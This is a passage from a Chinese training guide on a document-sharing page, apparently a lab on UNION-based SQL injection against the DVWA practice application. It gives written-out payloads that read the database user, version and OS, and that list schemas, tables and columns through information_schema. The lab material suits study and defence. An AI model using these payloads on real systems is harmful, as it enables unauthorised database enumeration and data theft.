网站大量收购独家精品文档,联系QQ:2885784924

Web安全与防护 实训指南 3.2SQL注入的高级利用.pdf

Web安全与防护 实训指南 3.2SQL注入的高级利用.pdf

  1. 1、本文档共6页,可阅读全部内容。
  2. 2、有哪些信誉好的足球投注网站(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
  3. 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  4. 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多

SQL注入的高级利用

【实训目的】

1、掌握MySQL元数据库information_schema的作用。

2、掌握UNION查询的应用要求。

3、能够利用SQL注入漏洞查询数据库的表名、字段名称与值。

【实训原理】

元数据是描述数据的数据,因此可利用元数据实现查询相关数据的目的,结

合union查询,利用SQL注入漏洞可查询数据库的表及字段值。

【实训步骤】

步骤一、分析SQL注入漏洞所在页面功能。

登录DVWA系统,选择左侧“DVWASecurity”中的low级别,再单击左侧

的“SQLInjection”。

步骤二、获取连接数据库账户信息、数据库名称、数据库版本信息。

利用union查询获取相关信息,union查询要求前后两个查询的列数要相同。

我们现在不关心union关键词前面查询语句查出的值,可以利用条件,如“and

1=2”让其不显示,在union关键词后面利用内置函数user(),及database(),version()

注入得出连接数据库用户以及数据库名称。

1.在UserID输入框中输入:1and1=2unionselectuser(),database()--显示

如下信息:

图3-6DVWA注入user()函数结果图

说明连接数据库的用户为root@localhost,数据库名称为dvwa

通过注入得到数据库名就成功了一半了。

2.利用version()函数,尝试得到版本信息,输入:

1and1=2unionselectversion(),database()--将得到如下信息:

图3-7DVWA注入version()函数结果图

可以查询到当前SQL版本是5.5.53。

3.利用concat_ws函数一次性查出所有信息。

在输入框中输入:

1and1=2unionselect1,concat_ws(0x2c,user(),database(),version())--

图3-8DVWA注入concat_ws()函数结果图

可以看到用户名、数据库及版本号。

步骤三、获得操作系统信息。

在UserID输入框中输入:

1and1=2unionselect1,@@global.version_compile_osfrommysql.user--

图3-9DVWA注入版本函数结果图

可见操作系统为win32版本。

步骤四、查询MySQL数据库中的各个数据库的信息。

在UserID输入框中输入:

1and1=2unionselect1,schema_namefrominformation_schema.schemata--

图3-10DVWA被暴库结果图

可以看到MySQL数据库中的各个数据库的信息。

步骤五、查询指定数据库中的表。

information_schema.tables表给出关于数据库中表的信息,在此查询DVWA

数据库中的表。在UserID输入框中输入:

1and1=2unionselect1,table_namefrominformation_schema.tableswhere

table_schema’DVWA’--,将显示如下信息:

图3-11猜测DVWA数据库中表的结果图

可见DVWA数据库中有guestbook、users两个表。

步骤六、查询指定表的所有字段。

在UserID输入框中输入:

1and1=2unionselect1,column_namefrominformation_schema.columnswhere

table_name=usersandtable_schema=dvwa--

图3-12猜测DVWA数据库中user表的字段

文档评论(0)

balala11 + 关注
实名认证
内容提供者

该用户很懒,什么也没介绍

1亿VIP精品文档

相关文档